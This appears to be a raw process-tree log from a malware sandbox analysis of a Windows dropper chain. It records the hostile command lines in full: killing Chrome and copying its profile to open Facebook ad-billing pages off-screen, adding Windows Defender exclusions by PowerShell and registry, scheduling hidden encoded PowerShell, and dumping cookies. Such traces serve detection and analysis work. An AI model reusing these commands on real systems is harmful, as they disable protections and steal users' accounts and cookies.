C:\Users\Admin\AppData\Local\Temp\kih5cj20.vgc\askinstall31.exe
16⤵
PID:3972

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
17⤵
PID:7652

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
18⤵
- Kills process with taskkill
PID:5512

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
17⤵
PID:7232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
17⤵
PID:1872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xd4,0xb0,0x7ffe13fd6e00,0x7ffe13fd6e10,0x7ffe13fd6e20
18⤵
PID:924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1640 /prefetch:8
18⤵
PID:6264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1540 /prefetch:2
18⤵
PID:7320

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2196 /prefetch:8
18⤵
PID:7772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
18⤵
PID:5588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:1
18⤵
PID:728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
18⤵
PID:2896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
18⤵
PID:6112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
18⤵
PID:7016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
18⤵
PID:2700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4848 /prefetch:8
18⤵
PID:8028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5152 /prefetch:8
18⤵
PID:2028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4600 /prefetch:8
18⤵
PID:5896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,2439392423677142415,3511865572949469528,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4856 /prefetch:8
18⤵
PID:808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\15u0epp4.ctu\customer6.exe & exit
15⤵
PID:7476

C:\Users\Admin\AppData\Local\Temp\15u0epp4.ctu\customer6.exe
C:\Users\Admin\AppData\Local\Temp\15u0epp4.ctu\customer6.exe
16⤵
PID:7504

C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
17⤵
PID:5132

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3vvsaymf.atr\HookSetp.exe & exit
15⤵
PID:5892

C:\Users\Admin\AppData\Local\Temp\3vvsaymf.atr\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\3vvsaymf.atr\HookSetp.exe
16⤵
PID:8152

C:\ProgramData\7001670.exe
"C:\ProgramData\7001670.exe"
17⤵
PID:7640

C:\ProgramData\2489320.exe
"C:\ProgramData\2489320.exe"
17⤵
PID:6772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\svnfbtep.kzj\19.exe & exit
15⤵
PID:7008

C:\Users\Admin\AppData\Local\Temp\svnfbtep.kzj\19.exe
C:\Users\Admin\AppData\Local\Temp\svnfbtep.kzj\19.exe
16⤵
PID:6788

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\install.vbs"
17⤵
PID:7540

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
18⤵
PID:1856

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rit31cde.knv\setup_10.2_mix.exe & exit
15⤵
PID:3608

C:\Users\Admin\AppData\Local\Temp\rit31cde.knv\setup_10.2_mix.exe
C:\Users\Admin\AppData\Local\Temp\rit31cde.knv\setup_10.2_mix.exe
16⤵
PID:4896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "
17⤵
PID:2200

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\54cyh3j1.nm5\GcleanerWW.exe /mixone & exit
15⤵
PID:9160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\svc3izpf.hua\b9706c20.exe & exit
15⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\svc3izpf.hua\b9706c20.exe
C:\Users\Admin\AppData\Local\Temp\svc3izpf.hua\b9706c20.exe
16⤵
PID:3732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\df1qko1a.5me\setup.exe /8-2222 & exit
15⤵
PID:8440

C:\Users\Admin\AppData\Local\Temp\df1qko1a.5me\setup.exe
C:\Users\Admin\AppData\Local\Temp\df1qko1a.5me\setup.exe /8-2222
16⤵
PID:6328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Red-Shape'
17⤵
PID:8228

C:\Program Files (x86)\Red-Shape\7za.exe
"C:\Program Files (x86)\Red-Shape\7za.exe" e -p154.61.71.51 winamp.7z
17⤵
PID:6812

C:\Program Files (x86)\Red-Shape\setup.exe
"C:\Program Files (x86)\Red-Shape\setup.exe" /8-2222
17⤵
PID:9088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bmpksnlh.hcl\setup.exe /S /kr /site_id=754 & exit
15⤵
PID:6836

C:\Users\Admin\AppData\Local\Temp\bmpksnlh.hcl\setup.exe
C:\Users\Admin\AppData\Local\Temp\bmpksnlh.hcl\setup.exe /S /kr /site_id=754
16⤵
PID:8004

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
17⤵
PID:5508

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
18⤵
PID:7204

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
19⤵
PID:9148

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
19⤵
PID:6564

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gILLAaWOS" /SC once /ST 08:46:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
17⤵
- Creates scheduled task(s)
PID:4960

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gILLAaWOS"
17⤵
PID:4988

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gILLAaWOS"
17⤵
PID:9008

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 12:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\PCoyVAQ.exe\" 9n /site_id 754 /S" /V1 /F
17⤵
- Creates scheduled task(s)
PID:7304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4nhrc3b4.nzk\Four.exe & exit
15⤵
PID:7732

C:\Users\Admin\AppData\Local\Temp\4nhrc3b4.nzk\Four.exe
C:\Users\Admin\AppData\Local\Temp\4nhrc3b4.nzk\Four.exe
16⤵
PID:6628

C:\Users\Admin\AppData\Local\Temp\557U9QRDF3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\557U9QRDF3\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
17⤵
PID:1168

C:\Users\Admin\AppData\Local\Temp\557U9QRDF3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\557U9QRDF3\multitimer.exe" 1 3.1617022623.6061ce9f219b0 104
18⤵
PID:7772

C:\Users\Admin\AppData\Local\Temp\557U9QRDF3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\557U9QRDF3\multitimer.exe" 2 3.1617022623.6061ce9f219b0
19⤵
PID:7284

C:\Users\Admin\AppData\Local\Temp\jddepm2hrg3\2ucje2ukzzo.exe
"C:\Users\Admin\AppData\Local\Temp\jddepm2hrg3\2ucje2ukzzo.exe" /ustwo INSTALL
20⤵
PID:7208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7208 -s 648
21⤵
- Program crash
PID:7772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7208 -s 656
21⤵
- Program crash
PID:3840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7208 -s 772
21⤵
- Program crash
PID:5432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7208 -s 808
21⤵
- Program crash
PID:7916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7208 -s 880
21⤵
- Program crash
PID:5836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7208 -s 948
21⤵
- Program crash
PID:8960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7208 -s 1148
21⤵
- Program crash
PID:5224

C:\Users\Admin\AppData\Local\Temp\cxj0mjffmnc\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\cxj0mjffmnc\Setup3310.exe" /Verysilent /subid=577
20⤵
PID:5232

C:\Users\Admin\AppData\Local\Temp\is-Q2J1R.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q2J1R.tmp\Setup3310.tmp" /SL5="$705A6,138429,56832,C:\Users\Admin\AppData\Local\Temp\cxj0mjffmnc\Setup3310.exe" /Verysilent /subid=577
21⤵
PID:9128

C:\Users\Admin\AppData\Local\Temp\is-IMDG4.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-IMDG4.tmp\Setup.exe" /Verysilent
22⤵
PID:2128

C:\Users\Admin\AppData\Local\Temp\bm2caexbyqa\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\bm2caexbyqa\AwesomePoolU1.exe"
20⤵
PID:6180

C:\Users\Admin\AppData\Local\Temp\kvudxq50dgk\vict.exe
"C:\Users\Admin\AppData\Local\Temp\kvudxq50dgk\vict.exe" /VERYSILENT /id=535
20⤵
PID:3980

C:\Users\Admin\AppData\Local\Temp\is-UAMRG.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UAMRG.tmp\vict.tmp" /SL5="$A0232,870426,780800,C:\Users\Admin\AppData\Local\Temp\kvudxq50dgk\vict.exe" /VERYSILENT /id=535
21⤵
PID:8636

C:\Users\Admin\AppData\Local\Temp\is-EUG6Q.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-EUG6Q.tmp\win1host.exe" 535
22⤵
PID:4284

C:\Users\Admin\AppData\Local\Temp\f025iqt1ir1\w2dadv3c24v.exe
"C:\Users\Admin\AppData\Local\Temp\f025iqt1ir1\w2dadv3c24v.exe" /1-610
20⤵
PID:7848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Young-Sun'
21⤵
PID:9200

C:\Users\Admin\AppData\Local\Temp\0vicho205rv\app.exe
"C:\Users\Admin\AppData\Local\Temp\0vicho205rv\app.exe" /8-23
20⤵
PID:8592

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Red-Hill'
21⤵
PID:6264

C:\Users\Admin\AppData\Local\Temp\KRL1JY4OUY\setups.exe
"C:\Users\Admin\AppData\Local\Temp\KRL1JY4OUY\setups.exe" ll
17⤵
PID:4268

C:\Users\Admin\AppData\Local\Temp\is-DDCQI.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DDCQI.tmp\setups.tmp" /SL5="$60318,587771,264704,C:\Users\Admin\AppData\Local\Temp\KRL1JY4OUY\setups.exe" ll
18⤵
PID:8236

C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe
"C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"
11⤵
PID:5188

C:\Users\Admin\AppData\Local\Temp\is-05FV7.tmp\LabPicV3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-05FV7.tmp\LabPicV3.tmp" /SL5="$40464,239334,155648,C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"
12⤵
PID:5864

C:\Users\Admin\AppData\Local\Temp\is-QA2TV.tmp\ppppppfy.exe
"C:\Users\Admin\AppData\Local\Temp\is-QA2TV.tmp\ppppppfy.exe" /S /UID=lab214
13⤵
PID:6752

C:\Program Files\javcse\KADMYUIJYH\prolab.exe
"C:\Program Files\javcse\KADMYUIJYH\prolab.exe" /VERYSILENT
14⤵
PID:2964

C:\Users\Admin\AppData\Local\Temp\is-VKU7B.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VKU7B.tmp\prolab.tmp" /SL5="$204FE,575243,216576,C:\Program Files\javcse\KADMYUIJYH\prolab.exe" /VERYSILENT
15⤵
PID:5664

C:\Users\Admin\AppData\Local\Temp\3f-2f0f4-9b7-c07b1-52d788c10c4e8\Cejykodyco.exe
"C:\Users\Admin\AppData\Local\Temp\3f-2f0f4-9b7-c07b1-52d788c10c4e8\Cejykodyco.exe"
14⤵
PID:6956

C:\Users\Admin\AppData\Local\Temp\fc-8992f-ef4-dc7a5-bba92044a3e71\Tatopucashe.exe
"C:\Users\Admin\AppData\Local\Temp\fc-8992f-ef4-dc7a5-bba92044a3e71\Tatopucashe.exe"
14⤵
PID:2648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1icyomz.2yx\gaooo.exe & exit
15⤵
PID:7120

C:\Users\Admin\AppData\Local\Temp\x1icyomz.2yx\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\x1icyomz.2yx\gaooo.exe
16⤵
PID:7368

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
17⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
17⤵
PID:7900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hzevtp4k.du3\md7_7dfj.exe & exit
15⤵
PID:5992

C:\Users\Admin\AppData\Local\Temp\hzevtp4k.du3\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\hzevtp4k.du3\md7_7dfj.exe
16⤵
PID:8048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vjffwvk4.roi\askinstall31.exe & exit
15⤵
PID:1208

C:\Users\Admin\AppData\Local\Temp\vjffwvk4.roi\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\vjffwvk4.roi\askinstall31.exe
16⤵
PID:7620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0cd5iga5.4xu\customer6.exe & exit
15⤵
PID:6460

C:\Users\Admin\AppData\Local\Temp\0cd5iga5.4xu\customer6.exe
C:\Users\Admin\AppData\Local\Temp\0cd5iga5.4xu\customer6.exe
16⤵
PID:2376

C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"
17⤵
PID:7888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fjaba0ny.jf1\HookSetp.exe & exit
15⤵
PID:4284

C:\Users\Admin\AppData\Local\Temp\fjaba0ny.jf1\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\fjaba0ny.jf1\HookSetp.exe
16⤵
PID:6820

C:\ProgramData\8600898.exe
"C:\ProgramData\8600898.exe"
17⤵
PID:5636

C:\ProgramData\76685.exe
"C:\ProgramData\76685.exe"
17⤵
PID:1208

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o0wt3jlf.wgh\19.exe & exit
15⤵
PID:8108

C:\Users\Admin\AppData\Local\Temp\o0wt3jlf.wgh\19.exe
C:\Users\Admin\AppData\Local\Temp\o0wt3jlf.wgh\19.exe
16⤵
PID:7836

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\install.vbs"
17⤵
PID:7060

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
18⤵
PID:7008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cm5hdvws.3rk\setup_10.2_mix.exe & exit
15⤵
PID:5820

C:\Users\Admin\AppData\Local\Temp\cm5hdvws.3rk\setup_10.2_mix.exe
C:\Users\Admin\AppData\Local\Temp\cm5hdvws.3rk\setup_10.2_mix.exe
16⤵
PID:616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "
17⤵
PID:8692

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ot0qy2bi.0ay\GcleanerWW.exe /mixone & exit
15⤵
PID:9044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2zxtyqdn.j5p\b9706c20.exe & exit
15⤵
PID:7896

C:\Users\Admin\AppData\Local\Temp\2zxtyqdn.j5p\b9706c20.exe
C:\Users\Admin\AppData\Local\Temp\2zxtyqdn.j5p\b9706c20.exe
16⤵
PID:5532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\thpweptu.oug\setup.exe /8-2222 & exit
15⤵
PID:4536

C:\Users\Admin\AppData\Local\Temp\thpweptu.oug\setup.exe
C:\Users\Admin\AppData\Local\Temp\thpweptu.oug\setup.exe /8-2222
16⤵
PID:5088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Delicate-Darkness'
17⤵
PID:8360

C:\Program Files (x86)\Delicate-Darkness\7za.exe
"C:\Program Files (x86)\Delicate-Darkness\7za.exe" e -p154.61.71.51 winamp.7z
17⤵
PID:8072

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ghgsj3rj.blq\setup.exe /S /kr /site_id=754 & exit
15⤵
PID:7564

C:\Users\Admin\AppData\Local\Temp\ghgsj3rj.blq\setup.exe
C:\Users\Admin\AppData\Local\Temp\ghgsj3rj.blq\setup.exe /S /kr /site_id=754
16⤵
PID:6260

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
17⤵
PID:7952

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
18⤵
PID:6920

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
19⤵
PID:9156

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
19⤵
PID:4408

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gLDHunXbg" /SC once /ST 01:41:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
17⤵
- Creates scheduled task(s)
PID:500

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gLDHunXbg"
17⤵
PID:8264

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jzhvmdfu.402\Four.exe & exit
15⤵
PID:6308

C:\Users\Admin\AppData\Local\Temp\jzhvmdfu.402\Four.exe
C:\Users\Admin\AppData\Local\Temp\jzhvmdfu.402\Four.exe
16⤵
PID:7668

C:\Users\Admin\AppData\Local\Temp\6GWP1JQ4ON\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\6GWP1JQ4ON\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
17⤵
PID:6816

C:\Users\Admin\AppData\Local\Temp\6GWP1JQ4ON\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\6GWP1JQ4ON\multitimer.exe" 1 3.1617022663.6061cec79570e 104
18⤵
PID:5568

C:\Users\Admin\AppData\Local\Temp\369X59EJX5\setups.exe
"C:\Users\Admin\AppData\Local\Temp\369X59EJX5\setups.exe" ll
17⤵
PID:8940

C:\Users\Admin\AppData\Local\Temp\is-HTHGL.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HTHGL.tmp\setups.tmp" /SL5="$105F8,587771,264704,C:\Users\Admin\AppData\Local\Temp\369X59EJX5\setups.exe" ll
18⤵
PID:7116

C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe
"C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe"
11⤵
